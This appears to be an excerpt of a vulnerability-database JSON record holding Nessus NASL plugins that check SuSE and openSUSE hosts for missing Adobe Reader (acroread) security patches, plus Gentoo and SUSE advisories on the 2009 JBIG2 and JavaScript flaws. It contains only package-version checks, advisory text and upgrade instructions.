acroread_ja (SAT Patch Number 769)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41365);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/10/25 13:36:35\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n\n script_name(english:\"SuSE 11 Security Update : acroread_ja (SAT Patch Number 769)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0193.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0658.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0927.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0928.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1062.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 769.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-8.1.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:29:28", "bulletinFamily": "scanner", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)", "modified": "2019-11-02T00:00:00", "id": "SUSE_ACROREAD_JA-6161.NASL", "href": "https://www.tenable.com/plugins/nessus/51705", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6161)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51705);\n script_version (\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:36\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6161)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0193.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0658.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0927.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0928.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6161.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread_ja-8.1.4-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:29:25", "bulletinFamily": "scanner", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)", "modified": "2019-11-02T00:00:00", "id": "SUSE_ACROREAD-6121.NASL", "href": "https://www.tenable.com/plugins/nessus/51690", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6121)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51690);\n script_version (\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:36\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6121)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0193.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0658.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0927.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0928.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6121.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-8.1.4-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:29:24", "bulletinFamily": "scanner", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "modified": "2019-11-02T00:00:00", "id": "SUSE_ACROREAD-6120.NASL", "href": "https://www.tenable.com/plugins/nessus/36033", "published": "2009-03-27T00:00:00", "title": "openSUSE 10 Security Update : acroread (acroread-6120)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-6120.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36033);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:36\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE 10 Security Update : acroread (acroread-6120)\");\n script_summary(english:\"Check for the acroread-6120 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"acroread-8.1.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:16", "bulletinFamily": "unix", "description": "### Background\n\nAdobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Reader: \n\n * Alin Rad Pop of Secunia Research reported a heap-based buffer overflow when processing PDF files containing a malformed JBIG2 symbol dictionary segment (CVE-2009-0193). \n * A buffer overflow related to a non-JavaScript function call and possibly an embedded JBIG2 image stream has been reported (CVE-2009-0658). \n * Tenable Network Security reported a stack-based buffer overflow that can be triggered via a crafted argument to the getIcon() method of a Collab object (CVE-2009-0927). \n * Sean Larsson of iDefense Labs reported a heap-based buffer overflow when processing a PDF file containing a JBIG2 stream with a size inconsistency related to an unspecified table (CVE-2009-0928). \n * Jonathan Brossard of the iViZ Security Research Team reported an unspecified vulnerability related to JBIG2 and input validation (CVE-2009-1061). \n * Will Dormann of CERT/CC reported a vulnerability lading to memory corruption related to JBIG2 (CVE-2009-1062). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted PDF document, possibly leading to the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-8.1.4\"", "modified": "2009-04-18T00:00:00", "published": "2009-04-18T00:00:00", "id": "GLSA-200904-17", "href": "https://security.gentoo.org/glsa/200904-17", "type": "gentoo", "title": "Adobe Reader: User-assisted execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:50:47", "bulletinFamily": "unix", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the Adobe Reader allowed attackers to crash acroread or even execute arbitrary code by tricking users into opening specially crafted PDF files. Please find more details at Adobe's site: http://www.adobe.com/support/security/bulletins/apsb09-04.html Note that Adobe did not provide updates for Adobe Reader 7 as used on NLD9. We cannot upgrade to newer versions due to library dependencies. We strongly encourage users of acroread on NLD9 to uninstall the package and to use an alternative, open source pdf viewer instead. We're currently evaluating the possibility of disabling acroread on NLD9 via online update.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-03-27T15:24:52", "published": "2009-03-27T15:24:52", "id": "SUSE-SA:2009:014", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00005.html", "title": "remote code execution in acroread", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}